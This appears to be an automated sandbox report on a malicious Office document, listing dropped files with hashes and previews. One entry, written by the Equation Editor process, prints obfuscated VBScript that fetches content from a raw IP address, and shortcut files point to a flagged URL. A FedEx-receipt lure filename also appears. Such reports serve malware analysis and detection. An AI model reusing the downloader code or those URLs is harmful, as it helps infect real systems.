                Preview:{\rtf1.........{\*\urtf347361619 \_}.{\943658764`*3^|;^||%(.36]048(^5)_?.;+&%&(%^.1/#%',;9=_:*|.-^@:#1%+1/?#,5#32]3*.<]?8(7.4^.&?+5)2#|~~1!%31`?1;,`4-?36/-5?_0+?--`???6.%`53!@(.`;3,?._+7&~&&].*^;?`1/-~@7?355!/?->?&@.^];&.4_*?]'_=3?]36?0?5];_0??!;^1]&[:~.1?,32/0$^3=*-?2.@7@.7>|55#7%4(?_7.+_6+$=?(7?/>41??6$_~.2*1]$?'4;`.~34?>1.:'7^~%%_+|?..(=9*|&:?;5~-#`%,%@)2<10*|.]%>)?=+,)&*?%!%]>._7]08.%|?9^!.]|$3|<^^/]8/3|?^4+,[:0|??<1(??+:|$/@57$^>,:#%4?3%?(.''>3(^$7|)9@&|)/._..?.+?^%38(,@^??.4/?<=.@_]?#~+@?<#.6;,4+4%!/![*_4!(?7?%.:=/&@?0.?!?&,.*6[,0!7>+`?>1%35<#@@%...?--<+<<1-~,=4=/-;^$.5^?3[.3.2_!.8%?6~_?]+@71.!.9.?29+]'%~.>5>:$/2`-.(%7+#?2>1@;@.3#+9.?`#^7~^?=^2!..]]9=-_@5.(<[5,|>|1$?.<&:+:7_4.8:87+/?+3<>!+&&72_9]3@)8>6=5.?44:+4<+?23_|**+7@#)?8?<?&.<&07*2.?|>|1[#,!$[9=`1`,4?+.7@>-[!,-.2_2[.?5#|;73^8[[#(?+%8).+.|%5%=+?%&5?,2&?15;]^!'?-0(.>)2.?.^!'(%`*22*%??1>286!??[*;?09)2]=,;$@~/?.5&?/;,;??~@,[-.?(9`%;>.'!?~@@.?*@../?4^%|5!1?[=08?&_$;?9_@41#<?'.977'6-,'`->(-4.7&4.;0%#?.?]-_9&4%!-~%>7.6-&<]9$</6#?]
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):50128
                Entropy (8bit):3.13941905677619
                Encrypted:false
                SSDEEP:768:4tHbsyguSUifiMcUzARRwn8KEVhyQBzKVO15DQclSBxkrSsAQYWS:yKDAMjARdKGhy0fyBy6
                MD5:A4D3F37D25C314D8BD34E11152527E97
                SHA1:6DF7C881FE8102F196CAE0D5AF9C00CC26583B02
                SHA-256:E0B38B2C8079038B0C98440A0A5945CBB86A41B72154D83EE25F8D362020F9BF
                SHA-512:6E95CA122B9718F0E80D5B666A294A066479365D910F3E450B535ABCEA7F55204122D1CB346DFDF69037FA9CA6EC821A1C05A5F13A162A74D509343F9006D1B2
                Malicious:false
                Preview:.................N...-..........g...Ca.. EMF................M...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...2. .(.5.c.3.e.8.0.d.,. .2.0.1.7.-.0.8.-.0.6.)...d.1.2.8.0.2.2.b.9.4.c.b.b.c.6.0.6.e.e.1.3.5.0.4.5.e.b.2.7.1.0.2...e.m.f.....................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...&...Drawing=1609.4x937.4px, 425.8x248.0mm...............................................................'.......................%...........%...........;................... ...6............#..6............*..6............-..6...........?-..6............-..6............*..6.......!....#..6.......!... ...6.......!...L...6...........U...6.........../...6...............6.........../...6...........U...6...........L...=.......<.......>.......................%...........(...........'.......................%...........%...........;...............z(......6.......u(......6.......o(......6.......n(..I...6.......n(..q...6.......p(......6...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):755272
                Entropy (8bit):3.2800316886847662
                Encrypted:false
                SSDEEP:6144:L4g7LHZhd54MAAKibsAfhwihZ4d0rK31/:Fd1AAKibsehwiP4d0W31/
                MD5:3267FCC2FD77EAF59559D8542A124EE0
                SHA1:48B7A23737C4F30FA960949D7399252F36C8939E
                SHA-256:7796BEEB72479F928650DF2C6EF5B8024C2626A3F305EC8A8A567EB4160EBD4D
                SHA-512:3B2B3E2EAA438E9B5343D9F38653C515945D8F11B57CABD697E5E7A3FF8DCD9952E27B32425C484D6661059619728A2B76FDAB8C5F638EB257CEDCB5201EF4BB
                Malicious:false
                Preview:....l...........d...Z............T...f.. EMF....H...............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................e...[..."...........!...............................................e...[..."...........!...............................................e...[..."...........!...............................................e...[..."...........!...............................................e...[...'...............YYY.....%...................YYY.....................................L...d...............Y...............Z...!..............?...........?................................'...............2.......%...........(...................2...L...d.......Y...............Y.......
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):18432
                Entropy (8bit):5.819048115140811
                Encrypted:false
                SSDEEP:192:6l3wc/6GUruX74c/w8wruX7pV2c/wUruX72Tc/wdyVNruX7eCc/wUruX7:kwP474097pEx72Tiy7eCx7
                MD5:B723410876C86FA42485AF34FEFCD907
                SHA1:1EE6B005D223F5A4FC52FA21DA820F4A0212813D
                SHA-256:B8F787095420D7A0B273CB3281F8B4EBE4096575578AD252FDF34D229097CB2B
                SHA-512:BDBEE8F940A743D380C4E07A7D5B9C529631B21DA368E0DDD94CA56CF560561D59302CDC164FF93A2730E96D4261938249F1422B6CA3F0F2FA853C8E1599E484
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:......................>......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."........... ...!.......................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):16896
                Entropy (8bit):3.570463528904758
                Encrypted:false
                SSDEEP:384:WH96rISpnfVurBfLtT8yPKlucoLVZOo9CHX6Uk6sQ690iAuD8LZ:c67pfVuFfL58aBbC6G690TuD8LZ
                MD5:4662D08709C089DA83DA8007A7DD6238
                SHA1:7586A47D8E880D4363DFF1BCF57DEF2CE33DCDE1
                SHA-256:95F1BC3CDD4903BB106EB40FABB9D70A98E8FB29810DC355A2C957F8E909D273
                SHA-512:CE0E97D1044F92A6D7ABA11BD66F054E17B5F44135F900CB7C2E983949E099DDC456DB5943F857A2DC701D15E4E67EB4B63AF9510A5AA1EAC9309214BF2DD4CA
                Malicious:false
                Preview:................4.3.6.5.8.7.6.4.`.*.3.^.|.;.^.|.|.%.(...3.6.].0.4.8.(.^.5.)._.?...;.+.&.%.&.(.%.^...1./.#.%.'.,.;.9.=._.:.*.|...-.^.@.:.#.1.%.+.1./.?.#.,.5.#.3.2.].3.*...<.].?.8.(.7...4.^...&.?.+.5.).2.#.|.~.~.1.!.%.3.1.`.?.1.;.,.`.4.-.?.3.6./.-.5.?._.0.+.?.-.-.`.?.?.?.6...%.`.5.3.!.@.(...`.;.3.,.?..._.+.7.&.~.&.&.]...*.^.;.?.`.1./.-.~.@.7.?.3.5.5.!./.?.-.>.?.&.@...^.].;.&...4._.*.?.].'._.=.3.?.].3.6.?.0.?.5.].;._.0.?.?.!.;.^.1.].&.[.:.~...1.?.,.3.2./.0.$.^.3.=.*.-.?.2...@.7.@...7.>.|.5.5.#.7.%.4.(.?._.7...+._.6.+.$.=.?.(.7.?./.>.4.1.?.?.6.$._.~...2.*.1.].$.?.'.4.;.`...~.3.4.?.>.1...:.'.7.^.~.%.%._.+.|.?.....(.=.9.*.|.&.:.?.;.5.~.-.#.`.%.,.%.@.).2.<.1.0.*.|...].%.>.).?.=.+.,.).&.*.?.%.!.%.].>..._.7.].0.8...%.|.?.9.^.!...].|.$.3.|.<.^.^./.].8./.3.|.?.^.4.+.,.[.:.0.|.?.?.<.1.(.?.?.+.:.|.$./.@.5.7.$.^.>.,.:.#.%.4.?.3.%.?.(...'.'.>.3.(.^.$.7.|.).9.@.&.|.)./..._.....?...+.?.^.%.3.8.(.,.@.^.?.?...4./.?.<.=...@._.].?.#.~.+.@.?.<.#...6.;.,.4.+.4.%.!./.!.[.*._.4.!.(.?.7.?.%...:.=./.&.@.?.0...?.
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.02560099555928886
                Encrypted:false
                SSDEEP:6:I3DPccXBcZvxggLR3apksPMDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPzBybGks4vYg3J/
                MD5:35BB914CB7529D6830DB226D0280E524
                SHA1:830423AEE093374D6A56EB417498CD305F0BD4EF
                SHA-256:DD457238A949FF6BDC6088813BEA6E3EC1A4A3A8C8E53ECC334696929B3ECDEE
                SHA-512:F51DE0069C0D13BE96F6E172C2F41A46E9AB1CA9ABCC957280F25C82BD2D3B3878C971448C5D8667EEA014AC49793A9BF30A21CBD4E1007FFC11D141360AF89E
                Malicious:false
                Preview:......M.eFy...z.)2..iRJ.).....S,...X.F...Fa.q..................................sE.y.IX..............FR.]D.3..3..!.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.02555472380356475
                Encrypted:false
                SSDEEP:6:I3DPcLdyIvxggLRLL6duDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPayenL6duvYg3J/
                MD5:275467E6780C37AE8123C88438C512BF
                SHA1:9FAB04FCAB90E13397F240E273CC0A526336F3AD
                SHA-256:7BB1686E2E1985ACCA5AC310DB73689ADF04371BDD185E2404433D3331759CFA
                SHA-512:FB10533302F1364FCCE0BB2854054B751CA36AADC2F6BC7AA78BC2A839978C44248608E1717D037CF366FAFD428E4F7BE2D125CF06FDD5456FC3D918053A36D4
                Malicious:false
                Preview:......M.eFy...z..C....A.q.....S,...X.F...Fa.q...............................C.H.e.' .........v:.v..F..PO.,|......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):176128
                Entropy (8bit):7.16425341609745
                Encrypted:false
                SSDEEP:3072:otoRM2jFbqW6sVJqFlRLWkUUjLIfb47HIgJUgXTVWX3KR9phu:otmM0lFqFzL5LIT47HDJ/TlNI
                MD5:00FFE30AA992F880D9B5F46DC360D399
                SHA1:374E31C49486B70C278E5CCCD2647D98DF4DD792
                SHA-256:1991BA813EC63531BA678F28BFA7B4D5F963628F329EDFFCF38A15C685CB2F83
                SHA-512:509E25448BAE9E4024C449C86BE4642EC42A87207422BF1B9BF61337DE36CF9940EFADD233885BFDD07053EF04F275F3EEFB07D2AB2D023A818BB4124DDEDC93
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):30208
                Entropy (8bit):7.295971928087045
                Encrypted:false
                SSDEEP:768:LqTDBP+dudGXy6dMR90KVIKiWZ/tcIeF:LqTVWdudGXHKR9VPhyIe
                MD5:BA62DEC6A4CFC33F17646EEE97C6117B
                SHA1:5F16A123FD2AC2658FE1D601CA724C5F6BD29FCA
                SHA-256:DB86F917382D8A20D223A9F79B165927E0A2B3DB13EC3AACAD6E2A7C63E01C76
                SHA-512:015B81527CF2AB0BA33876F2437E5447B09CE3A7357BE4D998385326EFFCB6C5DE7CAF4DC944D34508D78224B97064FE06CF2901B51F4D29ABDB7F7F16CEC26A
                Malicious:false
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9.......................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):126976
                Entropy (8bit):7.837807073370045
                Encrypted:false
                SSDEEP:3072:ItoRM2jFbqW6sVJqFlRLWkUUjLIfb47HIgJUg:ItmM0lFqFzL5LIT47HDJ
                MD5:CA165C954DD793BD304514A159F64205
                SHA1:2DE39F0A75C9859A02596CD1ECCADDE9FA9D1001
                SHA-256:6037FE889FC9D9C921A5DB6C487812226F190176A7EC6DC7C81EB15E3EBAF9A1
                SHA-512:AC569CAFC05E38A827EBFD3F4688AFB7504B8E1505B225AAC8985DF1372EB0B56D49895CC0C2162B37DD080B7560E295BF61582DA2066AC0DAFCC4CA68E7C224
                Malicious:false
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                File Type:data
                Category:dropped
                Size (bytes):10240
                Entropy (8bit):0.6739662216458647
                Encrypted:false
                SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                MD5:C61F99FE7BEE945FC31B62121BE075CD
                SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                Malicious:false
                Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                File Type:data
                Category:dropped
                Size (bytes):24152
                Entropy (8bit):0.7513521539333206
                Encrypted:false
                SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                SHA1:FA589EA7BA858C514079289BCEA3625432110427
                SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                Malicious:false
                Preview: ...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=<http://ilang.in/BrlcB>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):47
                Entropy (8bit):4.511619702557342
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/qo6jv:HRYFVm/dKv
                MD5:74B7B20DE6855D1255C4ECEED967D972
                SHA1:197F8414D6C89F6922AE73B4F67740AC12F4807F
                SHA-256:DDACDD06C181CC5275A09ACEE6D80632270519A5FBF4F7436973532E8C71161B
                SHA-512:3DBDA527D8C858BF88A8201FBA9BDEBD2D0D9EC2C6513B2968D688CF540A87AB645ED51DAD9E94662052C1FC8C431921FC561777CD51F4FCF3AB931075B50C0C
                Malicious:true
                Preview:[InternetShortcut]..URL=http://ilang.in/BrlcB..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=<http://ilang.in/>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):42
                Entropy (8bit):4.433634982148037
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/qoXvn:HRYFVm/d/n
                MD5:C959E84761331F00A1648380AEA62A45
                SHA1:6D72668142BB5AC5EF9A59EB597A14D3A28681EC
                SHA-256:ECD3EFC6B16BD69D16B608E30403E3872B6C7E47CB0B5A393128575B82FDD194
                SHA-512:C803A020DDEACE2F7C32988CE1202D2C2D4A9D1F04E4DD3A2E8E7607A9202425DF52CB6D69AF3B14923AC8CF1367BE135FC072E6D6B4C75463E4F0914854941F
                Malicious:true
                Preview:[InternetShortcut]..URL=http://ilang.in/..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Generic INItialization configuration [xls]
                Category:modified
                Size (bytes):113
                Entropy (8bit):5.054118011506886
                Encrypted:false
                SSDEEP:3:bDh+CJAM6Wid1AMVR6DVcSLo2mMEa1AMVR6DVcSLo2v:b1PJAM6pp+DOSLPE0p+DOSLL
                MD5:DB13A18C74332630B00B4EF58F9CEABF
                SHA1:8C1CD1737FBE78EDE01902C6BA30DAB010FCE412
                SHA-256:50075212B63FB9DB064615B123D6E6E1B029C5C687842D6D5299F0BEC9D20023
                SHA-512:05683EAD4649C1BBAD9830D52CCE835773FC801F24B6E0ABF85E197D9A53D8F7B79C7DD63E4E3586CF3853715DE039D2168DF1DE6D41BC9B6304497EDDBE30E7
                Malicious:false
                Preview:[folders]..BrlcB.url=0..ilang.in.url=0..FedEx Receipt_53065724643.LNK=0..[xls]..FedEx Receipt_53065724643.LNK=0..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.4797606462020303
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyRyaSiuW3hWRUbilfln:vdsCkWta5RJhhbidl
                MD5:CA9570952A5F48F847628233AB5AB2D4
                SHA1:109750BB54BEFE801619BFE33AFE1BA2DCC152AB
                SHA-256:35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
                SHA-512:0749A18934BD44BB05B250FF0FBC8F4630B0767F650CEDFCDF8C44E6E1EE8E3F250AB254F3F622F88A61EBA6FAA7F2138F6507441ACC4057652B93C2B0C50EE9
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text
                Category:dropped
                Size (bytes):70
                Entropy (8bit):4.109320924750694
                Encrypted:false
                SSDEEP:3:X6UWSvUvMQIMQcSXaSXVWXO/IL/cWvW/G/:qhSvUvVIMQckZscgUoW/s
                MD5:AB224770FE62AE2B0D959987EEB70724
                SHA1:F91193F76AACBDA1840FEC1519972A60FCFDACA4
                SHA-256:CA763477B398BB5E9650AE8A35022513B893A150B0507E8FAB5EEC8CF3B6B710
                SHA-512:BC37704069FEB831A71CB2925496748D06310ECAD6BE66235890FFB73CF2FFFE1922B1E86A4B81D2F2FF8691B9A7FF9291FE9CAEEF54821AB4409B94662EDA77
                Malicious:false
                Preview:short_1359230.1.ilang.in/.9728.479372032.31116358.68381893.31116356.*.
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):3492
                Entropy (8bit):3.712425528744081
                Encrypted:false
                SSDEEP:96:vH6OQwJH6OrH6ODnH6OMH6O7WH6O/LcDnJkxH6O6:/RhJEmlLcDn6xM
                MD5:EA1D347A4039B2E1E28ABC47632FEC36
                SHA1:665B0B2848158A97B869BC857B960E5B368C8FC3
                SHA-256:6EE8EEFF1A72D43329384218C45CBAF41DF6B7F3AFC7B95138B24087B796B07F
                SHA-512:355B6F49CC0034E642396C98B84A9B7C91A51604E27E91111B4790E08BCDBF863D3183854D103983D8C78C9A201B7A13187E72762017D0B718136FFD53A4544D
                Malicious:true
                Preview:..D.i.m. .R.c.q.q.r.N.c.i.K.z.e.W.K.K.c.H.N.n.x.u.Z.K.j.a.A.q.C.l.e.o.A.n.K.K.k.e.a.j.n.N.T.l.u.m.C.U.O.h.L.R.L.W.f.L.G.N.L.P.L.u.T.c.W.K.R.L.L.e.K.N.z.O.i.b.m.L.z.L.G.N.f.i.z.n.W.b.x.P.e.U.l.G.n.W.p.t.G.o.c.d.,. .T.L.L.A.U.k.J.e.W.H.k.f.U.W.d.K.r.x.L.U.i.n.m.z.f.W.S.t.B.p.t.x.K.c.W.l.x.L.Q.W.g.p.K.h.a.m.i.L.O.U.R.B.K.L.e.d.u.G.k.Z.x.K.f.P.d.b.o.N.B.h.R.W.L.R.L.e.Z.N.o.r.b.K.U.L.Z.b.c.I.n.c.p.U.v.W.T.z.r.q.P.B.....S.e.t. .R.c.q.q.r.N.c.i.K.z.e.W.K.K.c.H.N.n.x.u.Z.K.j.a.A.q.C.l.e.o.A.n.K.K.k.e.a.j.n.N.T.l.u.m.C.U.O.h.L.R.L.W.f.L.G.N.L.P.L.u.T.c.W.K.R.L.L.e.K.N.z.O.i.b.m.L.z.L.G.N.f.i.z.n.W.b.x.P.e.U.l.G.n.W.p.t.G.o.c.d. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....R.c.q.q.r.N.c.i.K.z.e.W.K.K.c.H.N.n.x.u.Z.K.j.a.A.q.C.l.e.o.A.n.K.K.k.e.a.j.n.N.T.l.u.m.C.U.O.h.L.R.L.W.f.L.G.N.L.P.L.u.T.c.W.K.R.L.L.e.K.N.z.O.i.b.m.L.z.L.G.N.f.i.z.n.W.b.x.P.e.U.l.G.n.W.p.t.G.o.c.d...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.4.1...2.1.6...1.8.3...1.3./.U.s.e.r.s._.A.P.I./.s.
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 06:53:18 2024, Security: 1
                Category:dropped
                Size (bytes):640000
                Entropy (8bit):7.965903614597148
                Encrypted:false
                SSDEEP:12288:8P0lFqFzu4LDJHTlNI+7d1JQ7D0hz9WH0PdZMv8uzvsFD8/1HqE5wFx/IAyiA:UQyzu4LDJzlNI+7d1OMhB9PMvP24t8gA
                MD5:7ED70967865A87C0B064B15564B4C573
                SHA1:C4AA8944D3261BB2E79EF0C309B2D5484F3C768C
                SHA-256:D61A8EEC64A824CAA9C5165A018EA14C7268D011C64D658C2044050B79A100C7
                SHA-512:2CC3819DDD4E4B1E131F2E551A09A11084526E901A8AA520BBD5F43A8F025F062551593D2102E3EFFC6A01C8C73E9C27B5BC4CB4526C99B04E087EC005C3E3AD
                Malicious:false
                Preview:......................>...............................................................j.......l.......n.......p.......................................................................................................................................................................................................................................................................................................................................................................................................................)................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 06:53:18 2024, Security: 1
                Category:dropped
                Size (bytes):640000
                Entropy (8bit):7.965903614597148
                Encrypted:false
